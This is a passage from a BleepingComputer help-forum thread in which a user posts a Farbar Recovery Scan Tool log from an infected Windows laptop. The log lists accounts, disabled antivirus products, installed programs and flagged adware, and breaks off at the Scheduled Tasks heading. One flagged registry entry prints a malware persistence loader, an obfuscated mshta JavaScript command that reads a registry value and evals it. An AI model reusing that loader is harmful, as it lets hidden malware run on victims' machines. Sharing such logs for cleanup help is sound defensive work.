Jump to content


 


Register a free account to unlock additional features at BleepingComputer.com
Welcome to BleepingComputer, a free community where people like yourself come together to discuss and learn how to use their computers. Using the site is easy and fun. As a guest, you can browse and view the various discussions in the forums, but can not create a new topic or reply to an existing one unless you are logged in. Other benefits of registering an account are subscribing to topics and forums, creating a blog, and having no ads shown anywhere on the site.


Click here to Register a free account now! or read our Welcome Guide to learn how to use this site.

Photo

Help , Need to get virus out my laptop


  • This topic is locked This topic is locked
137 replies to this topic

#31 danban

danban
  • Topic Starter

  • Members
  • 119 posts
  • OFFLINE
  •  
  • Gender:Male
  • Location:Bronx New York
  • Local time:12:04 PM

Posted 13 June 2018 - 06:12 PM

Here's the addition txt

 

 

Additional scan result of Farbar Recovery Scan Tool (x64) Version: 06.06.2018 01
Ran by Dan (12-06-2018 20:47:22)
Running from D:\
Windows 8.1 Connected (Update) (X64) (2015-01-30 09:55:12)
Boot Mode: Normal
==========================================================
 
 
==================== Accounts: =============================
 
Administrator (S-1-5-21-1066246007-1091995785-1061003623-500 - Administrator - Disabled)
Dan (S-1-5-21-1066246007-1091995785-1061003623-1001 - Administrator - Enabled) => C:\Users\Dan
Guest (S-1-5-21-1066246007-1091995785-1061003623-501 - Limited - Disabled)
 
==================== Security Center ========================
 
(If an entry is included in the fixlist, it will be removed.)
 
AV: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
AV: Bitdefender Antivirus Free Edition (Disabled - Up to date) {3FB17364-4FCC-0FA7-6BBF-973897395371}
AS: Bitdefender Antivirus Free Edition (Disabled - Up to date) {84D09280-69F6-0029-510F-AC4AECBE19CC}
AS: Comodo Defense+ (Disabled - Up to date) {6BAD9487-8DE8-D130-293E-C6A728B4104F}
AS: Windows Defender (Disabled - Up to date) {D68DDC3A-831F-4fae-9E44-DA132C1ACF46}
FW: COMODO Firewall (Disabled) {E8F7F446-E1BD-DFE6-38D1-54E0ADE01D89}
 
==================== Installed Programs ======================
 
(Only the adware programs with "Hidden" flag could be added to the fixlist to unhide them. The adware programs should be uninstalled manually.)
 
4K Video Downloader 4.4 (HKLM-x32\...\{CAB406EC-AF92-417D-9BBB-B2ECE1BC7BA6}) (Version: 4.4.2.2255 - Open Media LLC)
7-Zip (HKLM\...\{F43D5365-6E1C-4A2B-BE51-E16D9554FB1D}) (Version: 9.2.0 - 7-Zip) Hidden
7-Zip (HKLM-x32\...\7-Zip 9.2.0) (Version: 9.2.0 - 7-Zip)
Adobe Acrobat Reader DC (HKLM-x32\...\{AC76BA86-7AD7-1033-7B44-AC0F074E4100}) (Version: 18.011.20038 - Adobe Systems Incorporated)
Adobe After Effects CC 2015.3 (HKLM-x32\...\AEFT_13_8_0) (Version: 13.8.0 - Adobe Systems Incorporated)
Adobe Creative Cloud (HKLM-x32\...\Adobe Creative Cloud) (Version: 3.8.0.310 - Adobe Systems Incorporated)
Adobe Media Encoder CC 2015.3 (HKLM-x32\...\AME_10_3_0) (Version: 10.3.0 - Adobe Systems Incorporated)
Adobe Premiere Pro CC 2015 (HKLM-x32\...\{38C72D42-0672-43B1-9E05-E7631684F9A1}) (Version: 9.0.0 - Adobe Systems Incorporated)
Aeon (HKLM-x32\...\Aeon) (Version: 3.7.4 - SoundSpectrum)
Andy OS (HKLM\...\Andy OS) (Version: 0.45.5.0 - Andy OS, Inc)
Apple Application Support (HKLM-x32\...\{5D09C772-ECB3-442B-9CC6-B4341C78FDC2}) (Version: 2.3.4 - Apple Inc.)
Apple Software Update (HKLM-x32\...\{789A5B64-9DD9-4BA5-915A-F0FC0A1B7BFE}) (Version: 2.1.3.127 - Apple Inc.)
Applian Director (HKLM-x32\...\Applian Director3.01) (Version: 3.01 - Applian Technologies Inc.)
ASIO4ALL (HKLM-x32\...\ASIO4ALL) (Version: 2.12 - Michael Tippach)
ASUS Live Update (HKLM-x32\...\{FA540E67-095C-4A1B-97BA-4D547DEC9AF4}) (Version: 3.2.8 - ASUS)
ASUS Screen Saver (HKLM-x32\...\{0FBEEDF8-30FA-4FA3-B31F-C9C7E7E8DFA2}) (Version: 1.0.3 - ASUS)
ASUS Smart Gesture (HKLM-x32\...\{4D3286A6-F6AB-498A-82A4-E4F040529F3D}) (Version: 2.2.14 - ASUS)
ASUS Splendid Video Enhancement Technology (HKLM-x32\...\{0969AF05-4FF6-4C00-9406-43599238DE0D}) (Version: 2.01.0021 - ASUS)
ASUSDVD (HKLM-x32\...\{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.) Hidden
ASUSDVD (HKLM-x32\...\InstallShield_{DEC235ED-58A4-4517-A278-C41E8DAEAB3B}) (Version: 10.0.5712.52 - CyberLink Corp.)
AsusVibe2.0 (HKLM-x32\...\Asus Vibe2.0) (Version: 2.0.12.311 - ASUSTEK)
AVS Audio Converter 8.1.1 (HKLM-x32\...\AVS Audio Converter_is1) (Version: 8.1.1.549 - Online Media Technologies Ltd.)
AVS Audio Editor 8.1.1 (HKLM-x32\...\AVS Audio Editor_is1) (Version: 8.1.1.506 - Online Media Technologies Ltd.)
AVS Disc Creator 5.2.5 (HKLM-x32\...\AVS Disc Creator_is1) (Version: 5.2.5.536 - Online Media Technologies Ltd.)
AVS Document Converter 3.0.2 (HKLM-x32\...\AVS Document Converter_is1) (Version: 3.0.2.238 - Online Media Technologies Ltd.)
AVS Image Converter 4.0.2 (HKLM-x32\...\AVS Image Converter_is1) (Version: 4.0.2.281 - Online Media Technologies Ltd.)
AVS Media Player 4.3.1 (HKLM-x32\...\AVS Media Player_is1) (Version: 4.3.1.114 - Online Media Technologies Ltd.)
AVS Photo Editor 2.3.4 (HKLM-x32\...\AVS Photo Editor_is1) (Version: 2.3.4.148 - Online Media Technologies Ltd.)
AVS Registry Cleaner 3.0.3 (HKLM-x32\...\AVS Registry Cleaner_is1) (Version: 3.0.3.272 - Online Media Technologies Ltd.)
AVS Video Converter 9.2.1 (HKLM-x32\...\AVS4YOU Video Converter 7_is1) (Version: 9.2.1.579 - Online Media Technologies Ltd.)
AVS Video Editor 7.2.1 (HKLM-x32\...\AVS Video Editor_is1) (Version: 7.2.1.269 - Online Media Technologies Ltd.)
AVS Video ReMaker 5.0.2 (HKLM-x32\...\AVS Video ReMaker_is1) (Version: 5.0.2.175 - Online Media Technologies Ltd.)
Bandicam (HKLM-x32\...\Bandicam) (Version: 3.0.4.1036 - Bandisoft.com)
Bandicut (HKLM-x32\...\Bandicut) (Version: 1.2.7.132 - Bandisoft.com)
Bandisoft MPEG-1 Decoder (HKLM-x32\...\BandiMPEG1) (Version:  - Bandisoft.com)
Beta Bugs FloFi VST (HKLM-x32\...\FloFi) (Version: "1.1.0" - "BetaBugs")
Beta Bugs Moneo VST (HKLM-x32\...\Moneo) (Version: "1.0.0" - "BetaBugs")
Beta Bugs WideBug VST (HKLM-x32\...\WideBug) (Version: "1.0.0" - "BetaBugs")
Bitdefender Antivirus Free Edition (HKLM\...\BitDefender Gonzales) (Version: 1.0.21.1109 - Bitdefender)
Bonjour (HKLM\...\{6E3610B2-430D-4EB0-81E3-2B57E8B9DE8D}) (Version: 3.0.0.10 - Apple Inc.)
CCleaner (HKLM\...\CCleaner) (Version: 5.15 - Piriform)
COMODO Firewall (HKLM\...\{1EBC6C6F-7D31-4897-B241-DC7052F3E7A5}) (Version: 8.2.0.5027 - COMODO Security Solutions Inc.)
CrazyTalk Animator v2.0 Pipeline (HKLM-x32\...\{7127D4CC-78E6-41E3-8BCB-A50ED34846E2}) (Version: 2.0.1214.1 - Reallusion Inc.)
CrazyTalk v7.32 Standard (HKLM-x32\...\{27C4EA98-84A3-4CDF-A436-F984A0283357}) (Version: 7.32.3114.1 - Reallusion Inc.)
D3DX10 (HKLM-x32\...\{E09C4DB7-630C-4F06-A631-8EA7239923AF}) (Version: 15.4.2368.0902 - Microsoft) Hidden
DaVinci Resolve (HKLM\...\{9B4515CC-A703-49D2-85E6-5348CA30534D}) (Version: 12.5.0032 - Blackmagic Design)
DS-MP3 Source 1.30 (HKLM-x32\...\DS-MP3 Source) (Version:  - )
Eusing Free MP3 Cutter (HKLM-x32\...\Eusing Free MP3 Cutter) (Version:  - )
FaceGen Artist Demo (HKLM-x32\...\{280BB5D8-30DC-4D62-B4D5-A3C19BB30479}) (Version: 1.10.0.0 - Singular Inversions Inc.)
FaceGen Artist Pro (HKLM-x32\...\{F6F73B62-D4E0-46B0-BD1C-3F4F55B107D8}) (Version: 1.10.0.0 - Singular Inversions Inc.)
Flvto Youtube Downloader (HKLM-x32\...\Flvto Youtube Downloader) (Version: 0.6.9 - Hotger)
Gadwin PrintScreen (64-Bit) (HKLM\...\{819A52E1-0929-469A-BEB6-1AEBE0873CFC}) (Version: 5.4.2.0 - Gadwin Systems)
GIMP 2.8.16 (HKLM\...\GIMP-2_is1) (Version: 2.8.16 - The GIMP Team)
Google Chrome (HKLM-x32\...\Google Chrome) (Version: 65.0.3325.181 - Google Inc.)
Google Update Helper (HKLM-x32\...\{60EC980A-BDA2-4CB6-A427-B07A5498B4CA}) (Version: 1.3.33.7 - Google Inc.) Hidden
Gramblr (HKLM\...\Gramblr) (Version: 2.9.127 - Gramblr Team)
GROOVE 5.6.3 Pro Edition (HKLM\...\{21D8E7FE-7FE7-46B3-B578-22E1ABC5E407}) (Version: 5.6.3 - Gemini)
Intel® Processor Graphics (HKLM-x32\...\{F0E3AD40-2BBD-4360-9C76-B9AC9A5886EA}) (Version: 10.18.10.3355 - Intel Corporation)
Intel® Sideband Fabric Device Driver (HKLM-x32\...\C5A8BC6E-723A-4C0F-96E1-C426D1A4BCA9) (Version: 1.0.0.1002 - Intel Corporation)
Intel® Trusted Execution Engine (HKLM\...\{176E2755-0A17-42C6-88E2-192AB2131278}) (Version: 1.0.0.1064 - Intel Corporation)
ISSE version 0.2.0 (HKLM\...\{9330BAEC-6E26-4C5B-93A1-8BDD9ACF231B}_is1) (Version: 0.2.0 - CCRMA, Stanford University)
ivsEdits Free Edition (HKLM-x32\...\ivsEdits Free Edition) (Version:  - )
Java 8 Update 73 (HKLM-x32\...\{26A24AE4-039D-4CA4-87B4-2F83218073F0}) (Version: 8.0.730.2 - Oracle Corporation)
JBridge (HKLM-x32\...\JBridge) (Version:  - JBridge)
Junk Mail filter update (HKLM-x32\...\{0BE9E708-5DC0-4963-9CFD-0AA519090E79}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
KRISTAL Audio Engine (HKLM-x32\...\KRISTAL Audio Engine) (Version:  - )
Lightworks (HKLM-x32\...\{E94DD4E4-7746-472c-AA7B-1242FED0CFC8}) (Version: 12.6.0.0 - Lightworks)
LUXONIX LFX-1310 (HKLM-x32\...\LUXONIX_LFX-1310) (Version: 1.4 - LUXONIX)
MakeMKV v1.9.1 (HKLM-x32\...\MakeMKV) (Version: v1.9.1 - GuinpinSoft inc)
Massey Plugins Demos [Remove only] (HKLM-x32\...\Massey Plugins Demos) (Version:  - )
MediaShuttlePlugin-v5.4 (HKLM-x32\...\{BA567CFA-F158-44C3-AA40-1773478BD477}) (Version: 5.4.4.71844 - Signiant Inc.)
Microsoft Office (HKLM-x32\...\{90150000-0138-0409-0000-0000000FF1CE}) (Version: 15.0.4569.1506 - Microsoft Corporation)
Microsoft OneDrive (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\OneDriveSetup.exe) (Version: 18.025.0204.0009 - Microsoft Corporation)
Microsoft SQL Server 2005 Compact Edition [ENU] (HKLM-x32\...\{F0B430D1-B6AA-473D-9B06-AA3DD01FD0B8}) (Version: 3.1.0000 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{710f4c1c-cc18-4c49-8cbf-51240c89a1a2}) (Version: 8.0.61001 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (HKLM-x32\...\{7299052b-02a4-4627-81f2-1818da5d550d}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{071c9b48-7c32-4621-a0ac-3f809523288f}) (Version: 8.0.56336 - Microsoft Corporation)
Microsoft Visual C++ 2005 Redistributable (x64) (HKLM\...\{ad8a2fa1-06e7-4b0d-927d-6e54b3d31028}) (Version: 8.0.61000 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.17 (HKLM\...\{8220EEFE-38CD-377E-8595-13398D740ACE}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.4148 (HKLM\...\{4B6C7001-C7D6-3710-913E-5BC23FCE91E6}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x64 9.0.30729.6161 (HKLM\...\{5FCE6D76-F5DC-37AB-B2B8-22AB8CEDB1D4}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.17 (HKLM-x32\...\{9A25302D-30C0-39D9-BD6F-21E6EC160475}) (Version: 9.0.30729 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148 (HKLM-x32\...\{1F1C2DFC-2D24-3E06-BCB8-725134ADF989}) (Version: 9.0.30729.4148 - Microsoft Corporation)
Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (HKLM-x32\...\{9BE518E6-ECC6-35A9-88E4-87755C07200F}) (Version: 9.0.30729.6161 - Microsoft Corporation)
Microsoft Visual C++ 2010  x64 Redistributable - 10.0.40219 (HKLM\...\{1D8E6291-B0D5-35EC-8441-6616F567A0F7}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2010  x86 Redistributable - 10.0.40219 (HKLM-x32\...\{F0C3E5D1-1ADE-321E-8167-68EF0DE699A5}) (Version: 10.0.40219 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x64) - 11.0.61030 (HKLM-x32\...\{ca67548a-5ebe-413a-b50c-4b9ceb6d66c6}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2012 Redistributable (x86) - 11.0.61030 (HKLM-x32\...\{33d1fd90-4274-48a1-9bc1-97e33d9c2d6f}) (Version: 11.0.61030.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x64) - 12.0.30501 (HKLM-x32\...\{050d4fc8-5d48-4b8f-8972-47c82c46020f}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (HKLM-x32\...\{f65db027-aff3-4070-886a-0d87064aabb1}) (Version: 12.0.30501.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x64) - 14.0.23918 (HKLM-x32\...\{dab68466-3a7d-41a8-a5cf-415e3ff8ef71}) (Version: 14.0.23918.0 - Microsoft Corporation)
Microsoft Visual C++ 2015 Redistributable (x86) - 14.0.24215 (HKLM-x32\...\{e2803110-78b3-4664-a479-3611a381656a}) (Version: 14.0.24215.1 - Microsoft Corporation)
Movavi Video Editor 11 (HKLM-x32\...\Movavi Video Editor 11) (Version: 11.4.1 - Movavi)
Movavi Video Suite 12 (HKLM-x32\...\Movavi Video Suite 12) (Version: 12.0.0 - Movavi)
Movie Maker (HKLM-x32\...\{38F03569-A636-4CF3-BDDE-032C8C251304}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Movie Maker (HKLM-x32\...\{DD67BE4B-7E62-4215-AFA3-F123A800A389}) (Version: 16.4.3528.0331 - Microsoft Corporation) Hidden
Mozilla Firefox 55.0.3 (x86 en-US) (HKLM-x32\...\Mozilla Firefox 55.0.3 (x86 en-US)) (Version: 55.0.3 - Mozilla)
Mozilla Maintenance Service (HKLM\...\MozillaMaintenanceService) (Version: 54.0 - Mozilla)
mp3splt-gtk (HKLM-x32\...\mp3splt-gtk) (Version:  - )
Muvizu:Play - Heroes and villains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroesAndVillains) (Version:  - Digimania Ltd)
Muvizu:Play - Heroes and villains Lairs (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuHeroAndVillainLairs) (Version:  - Digimania Ltd)
Muvizu:Play - Lighting Presets (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuLightingPresets) (Version:  - Digimania Ltd)
Muvizu:Play - Mandy Content (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuMandyContentPack) (Version:  - Digimania Ltd)
Muvizu:Play - Prisons (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuPrisons) (Version:  - Digimania Ltd)
Muvizu:Play - Rosie (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuRosie) (Version:  - Digimania Ltd)
Muvizu:Play - Trains (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\MuvizuTrains) (Version:  - Digimania Ltd)
Muvizu:Play (HKLM-x32\...\Muvizu) (Version: 2015.08.20.01R - Digimania Ltd)
ocenaudio (HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ocenaudio) (Version: 2.0.14 - ocenaudio Team)
PitchWorks remove (HKLM-x32\...\PitchWorks DX) (Version:  - )
PrimoPDF -- brought to you by Nitro PDF Software (HKLM-x32\...\PrimoPDF) (Version: 5 - Nitro PDF Software)
Qualcomm Atheros Client Installation Program (HKLM-x32\...\{28006915-2739-4EBE-B5E8-49B25D32EB33}) (Version: 10.0 - Qualcomm Atheros)
QuickTime (HKLM-x32\...\{B67BAFBA-4C9F-48FA-9496-933E3B255044}) (Version: 7.74.80.86 - Apple Inc.)
Realtek Card Reader (HKLM-x32\...\{5BC2B5AB-80DE-4E83-B8CF-426902051D0A}) (Version: 6.2.9200.27040 - Realtek Semiconductor Corp.)
Realtek Ethernet Controller Driver (HKLM-x32\...\{8833FFB6-5B0C-4764-81AA-06DFEED9A476}) (Version: 8.20.815.2013 - Realtek)
Realtek High Definition Audio Driver (HKLM-x32\...\{F132AF7F-7BCA-4EDE-8A7C-958108FE7DBC}) (Version: 6.0.1.7213 - Realtek Semiconductor Corp.)
Recuva (HKLM\...\Recuva) (Version: 1.52 - Piriform)
Replay Media Catcher 5 (5.0.1.54) (HKLM-x32\...\Replay Media Catcher 5) (Version: 5.0.1.54 - Applian Technologies)
Replay Video Capture 7 (HKLM-x32\...\Replay Video Capture7.4) (Version: 7.4 - Applian Technologies Inc.)
SearchAwesome (HKLM\...\6320c4d4d9492959f6f8b43b8fdbf2f5) (Version: 13.14.1.204 (i1.0) - SearchAwesome) <==== ATTENTION
ShapeShop B5 (HKLM-x32\...\ShapeShop) (Version:  - )
Skype™ 7.33 (HKLM-x32\...\{3B7E914A-93D5-4A29-92BB-AF8C3F66C431}) (Version: 7.33.105 - Skype Technologies S.A.)
SMPlayer 16.6.0 (HKLM-x32\...\SMPlayer) (Version: 16.6.0 - Ricardo Villalba)
Softube Plug-Ins (VST AAX 32-bit) (HKLM-x32\...\Softube Plug-Ins (VST AAX 32-bit)) (Version: 2.2.91 - Softube AB)
Synfig Studio (HKLM-x32\...\synfigstudio) (Version: 1.0.2 - )
Total Recorder 8.5 Standard Edition (HKLM-x32\...\TotalRecorder) (Version:  - )
Tupi version 0.2-4 (HKLM-x32\...\Tupi_is1) (Version: 0.2-4 - )
Tweaking.com - Windows Repair (HKLM-x32\...\Tweaking.com - Windows Repair) (Version: 3.8.3 - Tweaking.com)
Update Installer for WildTangent Games App (HKLM-x32\...\{2FA94A64-C84E-49d1-97DD-7BF06C7BBFB2}.WildTangent Games App) (Version:  - WildTangent) Hidden
Virtual Magnifying Glass v3.6 (HKLM-x32\...\Virtual Magnifying Glass_is1) (Version:  - )
VLC media player (HKLM-x32\...\VLC media player) (Version: 2.2.4 - VideoLAN)
VMware Player (HKLM\...\{E452E727-86B8-4233-8CC3-41FD817AFAFF}) (Version: 6.0.7 - VMware, Inc.) Hidden
VMware VIX (HKLM-x32\...\{F99FC179-EA67-4BBC-8955-BDDA0CB94B88}) (Version: 1.13.7.62285 - VMware, Inc.)
WD My Cloud (HKLM\...\{3082756C-2147-411F-AE6A-9DCEF0121903}) (Version: 1.0.7.5 - Western Digital Technologies, Inc.)
WebStorage (HKLM-x32\...\WebStorage) (Version: 2.1.2.301 - ASUS Cloud Corporation)
WhiteCap (HKLM-x32\...\WhiteCap) (Version: 5.0.5 - SoundSpectrum)
WildTangent Games App (HKLM-x32\...\{70B446D1-E03B-4ab0-9B3C-0832142C9AA8}.WildTangent Games App-asus) (Version: 4.0.11.2 - WildTangent)
Winamp (HKLM-x32\...\Winamp) (Version: 5.666  - Nullsoft, Inc)
Windows Driver Package - ASUS (ATP) Mouse  (03/17/2014 1.0.0.207) (HKLM\...\AA2CC56D4BBEE037DC99871F5F6551133D2A0CC3) (Version: 03/17/2014 1.0.0.207 - ASUS)
Windows Live Essentials (HKLM-x32\...\WinLiveSuite) (Version: 16.4.3528.0331 - Microsoft Corporation)
Windows Media Encoder 9 Series (HKLM-x32\...\Windows Media Encoder 9) (Version:  - )
WinFlash (HKLM-x32\...\{8F21291E-0444-4B1D-B9F9-4370A73E346D}) (Version: 2.42.0 - ASUS)
WinPcap 4.1.3 (HKLM-x32\...\WinPcapInst) (Version: 4.1.0.2980 - Riverbed Technology, Inc.)
WinRAR 5.31 (32-bit) (HKLM-x32\...\WinRAR archiver) (Version: 5.31.0 - win.rar GmbH)
WinX DVD Ripper Platinum 7.5.18 (HKLM-x32\...\WinX DVD Ripper Platinum_is1) (Version:  - Digiarty Software, Inc.)
WonderFox DVD Ripper Speedy 8.1 (HKLM-x32\...\WonderFox DVD Ripper Speedy) (Version: 8.1 - WonderFox Soft, Inc.)
WonderFox DVD Video Converter 10.0 (HKLM-x32\...\WonderFox DVD Video Converter) (Version: 10.0 - WonderFox Soft, Inc.)
Yahoo! Toolbar (HKLM-x32\...\Yahoo! Companion) (Version:  - Yahoo! Inc.)
 
==================== Custom CLSID (Whitelisted): ==========================
 
(If an entry is included in the fixlist, it will be removed from the registry. The file will not be moved unless listed separately.)
 
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\...\ChromeHTML: ->  <==== ATTENTION
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{162C6FB5-44D3-435B-903D-E613FA093FB5}\InprocServer32 -> C:\Users\Dan\AppData\Local\Microsoft\OneDrive\17.3.6998.0830\amd64\FileCoAuthLib64.dll => No File
CustomCLSID: HKU\S-1-5-21-1066246007-1091995785-1061003623-1001_Classes\CLSID\{e8c77137-e224-5791-b6e9-ff0305797a13}\InprocServer32 -> C:\Program Files (x86)\Adobe\Adobe Creative Cloud\Utils\npAdobeAAMDetect64.dll (Adobe Systems)
HKU\S-1-5-21-1066246007-1091995785-1061003623-1001\Software\Classes\f2e8449: "C:\Windows\system32\mshta.exe" "javascript:TOWG9H8n="9fTue2";F6q=new ActiveXObject("WScript.Shell");yYl78Ye="OOPGIb";j0tdG8=F6q.RegRead("HKCU\\software\\wsfl\\nfhvb");CnQ2SRmC="VxncXy";eval(j0tdG8);Cw1zFO6q="2Od3ft0";" <==== ATTENTION
ShellIconOverlayIdentifiers: [ AccExtIco1] -> {AB9CF9F8-8A96-4F9D-BF21-CE85714C3A47} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco2] -> {853B7E05-C47D-4985-909A-D0DC5C6D7303} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [ AccExtIco3] -> {42D38F2E-98E9-4382-B546-E24E4D6D04BB} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ShellIconOverlayIdentifiers: [!AsusWSShellExt_B] -> {6D4133E5-0742-4ADC-8A8C-9303440F7191} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_O] -> {64174815-8D98-4CE6-8646-4C039977D809} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ShellIconOverlayIdentifiers: [!AsusWSShellExt_U] -> {1C5AB7B1-0B38-4EC4-9093-7FD277E2AF4E} => C:\Program Files (x86)\Common Files\AWS\2.1.2.301\ASUSWSShellExt64.dll [2013-06-25] (ASUS Cloud Corporation.)
ContextMenuHandlers1-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers1-x32: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers1-x32: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers1-x32: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers1-x32: [ShellConverter] -> {30A4E07E-068A-4d91-8F05-691283A1336B} => C:\Program Files (x86)\Common Files\AVSMedia\ActiveX\AVSShellConverter64.dll [2015-04-06] (Online Media Technologies Ltd.)
ContextMenuHandlers1-x32: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
ContextMenuHandlers1-x32: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers1-x32-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers2: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers2-x32: [VMDiskMenuHandler] -> {271DC252-6FE1-4D59-9053-E4CF50AB99DE} => C:\Program Files (x86)\VMware\VMware Player\vmdkShellExt.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers2-x32: [VMDiskMenuHandler64] -> {E4D28EDC-8C0B-43EE-9E7D-C8A8682334DC} => C:\Program Files (x86)\VMware\VMware Player\x64\vmdkShellExt64.dll [2015-06-24] (VMware, Inc.)
ContextMenuHandlers3: [BackupContextMenuExtension] -> {b1b96b20-da1d-4a3c-92c1-7229b32f2326} => C:\Windows\system32\mscoree.dll [2013-08-22] (Microsoft Corporation)
ContextMenuHandlers4-x32: [7-Zip] -> {23170F69-40C1-278A-1000-000100020000} => C:\Program Files (x86)\7-Zip\7-zip.dll [2010-11-18] (Igor Pavlov)
ContextMenuHandlers5: [igfxcui] -> {3AB1675A-CCFF-11D2-8B20-00A0C93CB1F4} => C:\Windows\system32\igfxpph.dll [2013-11-13] (Intel Corporation)
ContextMenuHandlers6: [AccExt] -> {2A118EB5-5797-4F5E-8B3D-F4ECBA3C98E4} => C:\Program Files (x86)\Adobe\Adobe Creative Cloud\CoreSyncExtension\CoreSync_x64.dll [2016-05-22] ()
ContextMenuHandlers6: [Comodo Antivirus] -> {4255A182-CAD9-4214-A19B-7BA7FB633BBD} => C:\Program Files\COMODO\COMODO Internet Security\cavshell.dll [2016-07-10] (COMODO)
ContextMenuHandlers6: [Gonzales] -> {A50F8401-953F-4C11-8B77-1278C6C7C3F4} => C:\Program File (x86) BitDefender Antivirus\Bitdefender\Antivirus Free Edition\GzShellIntegration.dll [2018-03-08] (Bitdefender)
ContextMenuHandlers6: [RUShellExt] -> {2C5515DC-2A7E-4BFD-B813-CACC2B685EB7} => C:\Program File (x86) - RevoUninPro - Uninstaller program - 30 Day Free Trial - 5-15-2016\Revo Uninstaller Pro\RUExt.dll [2012-12-29] (VS Revo Group)
ContextMenuHandlers6: [WinRAR] -> {B41DB860-64E4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext64.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [WinRAR32] -> {B41DB860-8EE4-11D2-9906-E49FADC173CA} => C:\Program File (x86) WinRar - Extract ISO & Rar Files\rarext.dll [2016-02-04] (Alexander Roshal)
ContextMenuHandlers6-x32: [_MovaviSuite10] -> {9D700AB0-33CE-4ab3-BD66-3A73CC2CEDE3} => C:\Program File (x86) Movavi Video Editor Suite 12 - (Free Cracked Version)\Movavi Video Suite 12\vcContext\vcContext.dll [2013-12-11] (Movavi)
ContextMenuHandlers1_S-1-5-21-1066246007-1091995785-1061003623-1001: [SysMenuExt] -> {020B1D4B-5738-4C77-9E19-4F173DD9B486} => C:\Program Files\Common Files\System\SysMenu64.dll -> No File
 
==================== Scheduled Tasks (Whitelisted) =============
 
